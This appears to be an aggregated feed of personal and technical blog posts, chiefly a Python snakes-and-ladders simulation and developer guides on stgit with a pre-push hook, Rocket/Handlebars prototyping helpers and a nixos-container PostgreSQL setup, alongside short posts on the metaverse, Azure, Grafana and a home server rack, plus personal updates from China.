Simple kids game, roll a dice and move along a board. Up ladders, down snakes. Not much to it?

We’ve been playing snakes and ladders a bit (lot) as a family because my 5 year old loves it. Our board looks like this:

Some games on this board take a really long time. My son likes to play games till the end, so until all players have finished. It’s apparently really funny when everyone else has finished and I keep finding the snakes over and over. Sometimes one player finishes really quickly - they hit some good ladders, few or no snakes and they are done in no time.

This got me thinking. What’s the distribution of game lengths for snakes and ladders? How long should we expect a game to take? How long before we typically have a winner?

Fortunately for me, snakes and ladders is a very simple game to model with a bit of python code.

Firstly, here are the rules we play:

1) Each player rolls a normal 6-sided dice and moves their token that number of squares forward.
2) If a player lands on the head of a snake, they go down the snake.
3) If a player lands on the bottom of a ladder, they go up to the top of the ladder.
4) If a player rolls a 6, they get another roll.
5) On this board, some ladders and snakes interconnect - the bottom of a snake is the head of another, or the top of a ladder is also the head of a snake. When this happens, you do all of the actions in turn, so down both snakes, or up the ladder and down the snake.
6) You don’t need an exact roll to finish; once you get to 100 or more, you are done.

To model the board in python, all we really need are the coordinates of the snakes and the ladders - their starting and ending squares.

def get_snakes_and_ladders():
    snakes = [
        (96,27),
        (88,66),
        (89,46),
        (79,44),
        (76,19),
        (74,52),
        (57,3),
        (60,39),
        (52,17),
        (50,7),
        (32,15),
        (30,9)
    ]
    ladders = [
        (6,28),
        (10,12),
        (18,37),
        (40,42),
        (49,67),
        (55,92),
        (63,76),
        (61,81),
        (86,94)
    ]
    return snakes + ladders

Since snakes and ladders are both mappings from one point to another, we can combine them in one array as above.

The game is modelled with a few lines of Python:

class Game:

    def __init__(self) -> None:
        self.token = 1
        snakes_and_ladders_list = get_snakes_and_ladders()
        self.sl = {}
        for entry in snakes_and_ladders_list:
            self.sl[entry[0]] = entry[1]

    def move(self, howmany):
        self.token += howmany
        while (self.token in self.sl):
            self.token = self.sl[self.token]
        return self.token

    def turn(self):
        num = self.roll()
        self.move(num)
        if num == 6:
            self.turn()
        if self.token>=100:
            return True
        return False

    def roll(self):
        return randint(1,6)

A turn consists of all the actions taken by a player before the next player gets their turn. This can consist of multiple moves if the player rolls one or more sixes, as rolling a six gives you another move.

With this, we can run some games and plot them. Here’s what a sample looks like.

The Y axis is the position on the board, and the X axis is the number of turns. This small graphical representation of the game shows how variable it can be. The red player finishes in under 20 moves, whereas the orange player takes over 80.

To see how variable it is, we can run the simulation a large number of times and look at the results. Running for 10,000 games we get the following:

statistic  result
min        5
max        918
mean       90.32
median     65

So the fastest finish in 10,000 games was just 5 turns, and the slowest was an awful (if you were rolling the dice) 918 turns.
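As a rough sanity check on those numbers: rolling a six earns another roll, so a turn averages 1/(1 - 1/6) = 1.2 rolls of 3.5 squares each, or about 4.2 squares per turn. Ignoring snakes and ladders entirely, reaching square 100 would therefore take around 24 turns, so a median of 65 shows just how much the snakes drag the game out.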

Here are some histograms for the distribution of game lengths, the distribution of number of turns for a player to win in a 3 person game, and the number of turns for all players to finish in a 3 person game.

The python code for this post is at snakes.py

Alex HudsonIntroduction to the Metaverse

You’ve likely heard the term “metaverse” many times over the past few years, and outside the realm of science fiction novels, it has tended to refer to some kind of computer-generated world. There’s often little distinction between a “metaverse” and a relatively interactive virtual reality world.

There are a huge number of people who think this is simply a marketing term, and Facebook’s recent rebranding of its holding company to “Meta” has only reinforced this view. However, I think this view is wrong, and I hope to explain why.

Alex HudsonIt's tough being an Azure fan

Azure has never been the #1 cloud provider - that spot continues to belong to AWS, which is the category leader. However, in most people’s minds, it has been a pretty reasonable #2, and while not necessarily vastly differentiated from AWS, there are enough things to write home about.

However, even as a user and somewhat of a fan of the Azure technology, it is proving increasingly difficult to recommend.

Josh HollandMore on git scratch branches: using stgit

More on git scratch branches: using stgit

I wrote a short post last year about a useful workflow for preserving temporary changes in git by using a scratch branch. Since then, I’ve come across stgit, which can be used in much the same way, but with a few little bells and whistles on top.

Let’s run through a quick example to show how it works. Let’s say I want to play around with the cool new programming language Zig and I want to build the compiler myself. The first step is to grab a source code checkout:

$ git clone https://github.com/ziglang/zig
        Cloning into 'zig'...
        remote: Enumerating objects: 123298, done.
        remote: Counting objects: 100% (938/938), done.
        remote: Compressing objects: 100% (445/445), done.
        remote: Total 123298 (delta 594), reused 768 (delta 492), pack-reused 122360
        Receiving objects: 100% (123298/123298), 111.79 MiB | 6.10 MiB/s, done.
        Resolving deltas: 100% (91169/91169), done.
        $ cd zig
        

Now, according to the instructions we’ll need to have CMake, GCC or clang and the LLVM development libraries to build the Zig compiler. On NixOS it’s usual to avoid installing things like this system-wide but instead use a file called shell.nix to specify your project-specific dependencies. So here’s the one ready for Zig (don’t worry if you don’t understand the Nix code, it’s the stgit workflow I really want to show off):

$ cat > shell.nix << EOF
        { pkgs ? import <nixpkgs> {} }:
        pkgs.mkShell {
          buildInputs = [ pkgs.cmake ] ++ (with pkgs.llvmPackages_12; [ clang-unwrapped llvm lld ]);
        }
        EOF
        $ nix-shell
        

Now we’re in a shell with all the build dependencies, and we can go ahead with the mkdir build && cd build && cmake .. && make install steps from the Zig build instructions [1].

But now what do we do with that shell.nix file?

$ git status
        On branch master
        Your branch is up to date with 'origin/master'.
        
        Untracked files:
          (use "git add <file>..." to include in what will be committed)
                shell.nix
        
        nothing added to commit but untracked files present (use "git add" to track)
        

We don’t really want to add it to the permanent git history, since it’s just a temporary file that is only useful to us. But the other options of just leaving it there untracked or adding it to .git/info/exclude are unsatisfactory as well: before I started using scratch branches and stgit, I often accidentally deleted my shell.nix files which were sometimes quite annoying to have to recreate when I needed to pin specific dependency versions and so on.

But now we can use stgit to take care of it!

$ stg init # stgit needs to store some metadata about the branch
        $ stg new -m 'add nix config'
        Now at patch "add-nix-config"
        $ stg add shell.nix
        $ stg refresh
        Now at patch "add-nix-config"
        

This little dance creates a new commit adding our shell.nix, managed by stgit. You can stg pop it to unapply, stg push [2] to reapply, and stg pull to do a git pull and reapply the patch back on top. The main stgit documentation is helpful to explain all the possible operations.
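For example, with the patch from above:

$ stg pop add-nix-config    # unapply: shell.nix drops out of the working tree
$ stg push add-nix-config   # reapply it
$ stg pull                  # git pull, then reapply the applied patches on top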

This solves all our problems! We have basically recreated the scratch branch from before, but now we have pre-made tools to apply, un-apply and generally play around with it. The only problem is that it’s really easy to accidentally push your changes back to the upstream branch.

Let’s have another example. Say I’m sold on the stgit workflow: I have a patch at the bottom of my stack adding some local build tweaks and, on top of that, a patch that I’ve just finished working on that I want to push upstream.

$ cd /some/other/project
        $ stg series # show all my patches
        + add-nix-config
        > fix-that-bug
        

Now I can use stg commit to turn my stgit patch into a real immutable git commit that stgit isn’t going to mess around with any more:

$ stg commit fix-that-bug
        Popped fix-that-bug -- add-nix-config
        Pushing patch "fix-that-bug" ... done
        Committed 1 patch
        Pushing patch "add-nix-config" ... done
        Now at patch "add-nix-config"
        

And now what we should do before git pushing is stg pop -a to make sure that we don’t push add-nix-config or any other local stgit patches upstream. Sadly it’s all too easy to forget that, and since stgit updates the current branch to point at the current patch, just doing git push here will include the commit representing the add-nix-config patch.

The way to prevent this is through git’s hook system. Save this as pre-push [3] (make sure it’s executable):

#!/bin/bash
        # An example hook script to verify what is about to be pushed.  Called by "git
        # push" after it has checked the remote status, but before anything has been
        # pushed.  If this script exits with a non-zero status nothing will be pushed.
        #
        # This hook is called with the following parameters:
        #
        # $1 -- Name of the remote to which the push is being done
        # $2 -- URL to which the push is being done
        #
        # If pushing without using a named remote those arguments will be equal.
        #
        # Information about the commits which are being pushed is supplied as lines to
        # the standard input in the form:
        #
        #   <local ref> <local sha1> <remote ref> <remote sha1>
        
        remote="$1"
        url="$2"
        
        z40=0000000000000000000000000000000000000000
        
        while read local_ref local_sha remote_ref remote_sha
        do
            if [ "$local_sha" = $z40 ]
            then
                # Handle delete
                :
            else
                # verify we are on a stgit-controlled branch
                git show-ref --verify --quiet "${local_ref}.stgit" || continue
                if [ $(stg series --count --applied) -gt 0 ]
                then
                    echo >&2 "Unapplied stgit patch found, not pushing"
                    exit 1
                fi
            fi
        done
        
        exit 0
        

Now we can’t accidentally [4] shoot ourselves in the foot:

$ git push
        Unapplied stgit patch found, not pushing
        error: failed to push some refs to <remote>
        

Happy stacking!


  [1] At the time of writing, Zig depends on the newly-released LLVM 12 toolchain, but this hasn’t made it into the nixos-unstable channel yet, so this probably won’t work on your actual NixOS machine.

  [2] An unfortunate naming overlap between pushing onto a stack and pushing a git repo.

  [3] A somewhat orthogonal but also useful tip, so that you don’t have to manually add this to every repository, is to configure git’s core.hooksPath to something like ~/.githooks and put it there.

  [4] You can always pass --no-verify if you want to bypass the hook.

Jon FautleyUsing the Grafana Cloud Agent with Amazon Managed Prometheus, across multiple AWS accounts

Observability is all the rage these days, and the process of collecting metrics is getting easier. Now, the big(ger) players are getting in on the action, with Amazon releasing a Managed Prometheus offering and Grafana now providing a simplified “all-in-one” monitoring agent. This is a quick guide to show how you can couple these two together, on individual hosts, and incorporating cross-account access control. The Grafana Cloud Agent Grafana Labs have taken (some of) the best bits of the Prometheus monitoring stack and created a unified deployment that wraps the individual moving parts up into a single binary.

Paul RaynerValentines Gift - a Tidy Computer Cupboard

Today, my lovely wife (who is far more practical than me) gave me this as a Valentine’s present (along with a nice new pair of Nano X1 trainers).

This is my nice new home server rack. It’s constructed from the finest pallet wood and repurposed chipboard, and has 8 caster wheels (cheaper than the Apple ones) on the bottom.

After three and a half years living in our house, the cupboard under the stairs was a mess of jumbled cables and computer bits. It all worked, but with things balanced on other things, held up by their cables, and three years of dust everywhere, it really needed an overhaul. We’ve recently had a new fibre connection go in (yay - 1Gbps at home!), so yet another cable, and yet another box to balance on top of other boxes.

This was the sorry mess that I called a home network this morning:

And thanks to my lovely gift, and some time to rewire everything (make new cables), it now looks like this:

and a close up:

In there I have my server, UPS, NAS, phone system, lighting system, FTTC broadband, Fibre broadband, router, main switch, and a cable going out and round the house into my office. Lovely and neat, and because it’s on wheels, I can pull it out to get round the back :-)

I am very happy with my new setup.

Paul RudkinSpring Festival Extra Bandwidth

Due to local restrictions on mass gatherings, my employer’s Spring Festival Ceremony will this year be held online for all employees (> 2000).

To support the peak in bandwidth demand, some of the mobile phone providers have added additional cells in the grounds of our company. They have been testing for the last few days, so in a few hours we will see how they will perform!!

Paul Rudkin

The roads of China have just got a little more dangerous. My wife has passed her China driving test today!

People of China, save yourself while you can!

Paul Rudkin

Need coffee.

Paul RudkinShanghai reports 6 local COVID-19 cases, first outbreak since November - Global Times

Shanghai found six local confirmed COVID-19 cases in its most populous downtown Huangpu district on Thursday, two months since the last local case was reported in the city, local health authority said on Friday.

Source:Shanghai reports 6 local COVID-19 cases, first outbreak since November - Global Times

Paul RaynerHelper functions for prototyping with Rocket

Over the holidays I have enjoyed playing a little with Rocket. Here are a couple of things I’ve written which might be useful to others when prototyping a new site using Rocket.

Firstly, the examples show you how to create an instance of a struct from either a Query or a Form, but when using a template (I am using a Rust implementation of Handlebars) it can be useful to just pass all of the fields through as a map. Here are two simple methods (one for Form, another for Query) which populate a HashMap with the incoming data.

struct RequestMap {
    map: HashMap<String, String>
}

impl<'f> FromForm<'f> for RequestMap {
    type Error = ();

    fn from_form(items: &mut FormItems<'f>, _strict: bool) -> Result<RequestMap, ()> {
        let mut map = HashMap::new();
        for item in items {
            let k = item.key.url_decode().map_err(|_| ())?;
            let v = item.value.url_decode().map_err(|_| ())?;
            map.insert(k, v);
        }
        Ok(RequestMap { map })
    }
}

impl FromQuery<'_> for RequestMap {
    type Error = ();

    fn from_query(items: Query) -> Result<RequestMap, ()> {
        let mut map = HashMap::new();
        for item in items {
            let k = item.key.url_decode().map_err(|_| ())?;
            let v = item.value.url_decode().map_err(|_| ())?;
            map.insert(k, v);
        }
        Ok(RequestMap { map })
    }
}

We create a struct RequestMap which contains just a HashMap, then implement the FromForm and FromQuery traits for it.

Now these maps can be used in routes as follows:

#[get("/example_get/<name>?<params..>")]
fn example_get_route(name: String, params: RequestMap) -> Template {
    Template::render(name, &params.map)
}

#[post("/example_post/<name>", data="<params>")]
fn example_post_route(name: String, params: Form<RequestMap>) -> Template {
    Template::render(name, &params.into_inner().map)
}

In these examples I have also set up a name parameter which maps to the template name, so you can copy and paste templates around and try them out with different parameters easily.
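With the server running locally (Rocket listens on port 8000 by default), trying out a hypothetical “signup” template is just a curl away:

$ curl 'http://localhost:8000/example_get/signup?username=paul'
$ curl -d 'username=paul' 'http://localhost:8000/example_post/signup'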

The second thing I have found useful in prototyping with Rocket is to set up a Handlebars helper to print out information from the provided context. You can have it render as a comment in your template, so that you can easily see what context is being provided.

Here is the helper definition:

#[derive(Clone,Copy)]
struct DebugInfo;

impl HelperDef for DebugInfo {
    fn call<'reg: 'rc, 'rc>(&self, h: &Helper, _: &Handlebars, ctxt: &Context, rc: &mut RenderContext, out: &mut dyn Output) -> HelperResult {
        out.write(&format!("Context:{:?}",ctxt.data()))?;
        out.write(&format!("Current Template:{:?}", rc.get_current_template_name()))?;
        out.write(&format!("Root Template:{:?}", rc.get_root_template_name()))?;
        for (key, value) in h.hash() {
            out.write(&format!("HashKey:{:?}, HashValue:{:?}",key, value))?;
        }
        Ok(())
    }
}

and you set it up like this in the Rocket initialisation:

rocket::ignite().mount("/", routes![index,example_get_route,example_post_route])
        .attach(Template::custom(|engines|{
            engines.handlebars.register_helper("debug", Box::new(DebugInfo));
        }))

To use this as a helper, put something like this inside your Handlebars template:

<!--{{debug nameparam=username}}-->

The output should look something like this:

<!--Context:Object({"username": String("aa")})Current Template:Some("testroute")Root Template:Some("testroute")HashKey:"nameparam", HashValue:PathAndJson { relative_path: Some("username"), value: Context(String("paul"), ["username"]) }-->

The above is for a GET request where the URL was http:///testroute?username=paul

Thanks for reading. I hope the above proves useful - I am still experimenting with Rocket (also with writing Handlebars helpers and combining all this with htmx ), so there may be simpler or better ways of achieving the above. If you know of one, or if you have any questions, suggestions, or to point out any mistakes, please contact me at the email address below. I’d love to hear from you.

Josh HollandSetting up a dev environment for PostgreSQL with nixos-container

Setting up a dev environment for PostgreSQL with nixos-container

I’ve been using NixOS for about a month now, and one of my favourite aspects is using lorri and direnv to avoid cluttering up my user or system environments with packages I only need for one specific project. However, they don’t work quite as well when you need access to a service like PostgreSQL, since all they can do is install packages to an isolated environment, not run a whole RDBMS in the background.

For that, I have found using nixos-container works very well. It’s documented in the NixOS manual. We’ll be using it in ‘imperative mode’, since editing the system configuration is the exact thing we don’t want to do. You will need sudo/root access to start containers, and I’ll assume you have lorri and direnv set up (e.g. via services.lorri.enable = true in your home-manager config).

We’ll make a directory to work in, and get started in the standard lorri way:

$ mkdir foo && cd foo
        $ lorri init
        Jul 11 21:23:48.117 INFO wrote file, path: ./shell.nix
        Jul 11 21:23:48.117 INFO wrote file, path: ./.envrc
        Jul 11 21:23:48.117 INFO done
        direnv: error /home/josh/c/foo/.envrc is blocked. Run `direnv allow` to approve its content
        $ direnv allow .
        Jul 11 21:24:10.826 INFO lorri has not completed an evaluation for this project yet, expr: /home/josh/c/foo/shell.nix
        direnv: export +IN_NIX_SHELL
        

Now we can edit our shell.nix to install PostgreSQL so we can access it as a client:

# shell.nix
        { pkgs ? import <nixpkgs> {} }:
        
        pkgs.mkShell {
          buildInputs = [
            pkgs.postgresql
          ];
        }
        

Save that and lorri will start installing it in the background.

Now, we can define our container, by providing its configuration in a file. I have called it container.nix, but I don’t think there’s a standard name for it like there is for shell.nix. Here it is:

# container.nix
        { pkgs, ... }:
        
        {
          system.stateVersion = "20.09";
        
          networking.firewall.allowedTCPPorts = [ 5432 ];
        
          services.postgresql = {
            enable = true;
            enableTCPIP = true;
            extraPlugins = with pkgs.postgresql.pkgs; [ postgis ];
            authentication = "host all all 10.233.0.0/16 trust";
        
            ensureDatabases = [ "foo" ];
            ensureUsers = [{
              name = "foo";
              ensurePermissions."DATABASE foo" = "ALL PRIVILEGES";
            }];
          };
        }
        

It’s important to make sure the firewall opens the port so that we can actually access PostgreSQL, and I’ve also installed the postgis extension for geospatial tools. The authentication line means that any user on any container can authenticate as any user with no checking: fine for development purposes, but obviously be careful not to expose this to the internet! Finally, we set up a user and a database to do our work in.

Now, we can actually create and start the container using the nixos-container tool itself. This is the only step that requires admin rights.

$ sudo nixos-container create foo --config-file container.nix
        $ sudo nixos-container start foo
        

By now, lorri should have finished installing PostgreSQL into your local environment, so once nixos-container has finished running, you should be able to access the new database inside the container:

$ psql -U foo -h $(nixos-container show-ip foo) foo
        psql (11.8)
        Type "help" for help.
        
        foo=> \l
                                          List of databases
           Name    |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges
        -----------+----------+----------+-------------+-------------+-----------------------
         foo       | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =Tc/postgres         +
                   |          |          |             |             | postgres=CTc/postgres+
                   |          |          |             |             | foo=CTc/postgres
         postgres  | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
         template0 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
                   |          |          |             |             | postgres=CTc/postgres
         template1 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
                   |          |          |             |             | postgres=CTc/postgres
        (4 rows)
        

And there we go! We have a container that we can access from the command line, or from an app, and we didn’t need to install PostgreSQL globally. We can even have multiple containers like this for different projects, and they’ll all use the same Nix store for binaries but have completely isolated working environments.

The nixos-container tool itself is a fairly thin wrapper around systemd (the containers themselves work via systemd-nspawn). The containers won’t auto-start, and you have to use systemctl to make that happen:

$ sudo systemctl enable container@foo.service
        

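When you’re finished with a project, the container and its state can be removed entirely:

$ sudo nixos-container destroy foo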
As a final flourish, we can save having to type in the user, host IP and database with very little effort, since we’re already using direnv and most tools can take their PostgreSQL configuration from some standard environment variables. We just have to add them to our .envrc file, and then re-allow it.

$ cat .envrc
        PGHOST=$(nixos-container show-ip foo)
        PGUSER=foo
        PGDATABASE=foo
        export PGHOST PGUSER PGDATABASE
        
        eval "$(lorri direnv)"
        $ direnv allow .
        $ psql
        psql (11.8)
        Type "help" for help.
        
        foo=>
        

Footnotes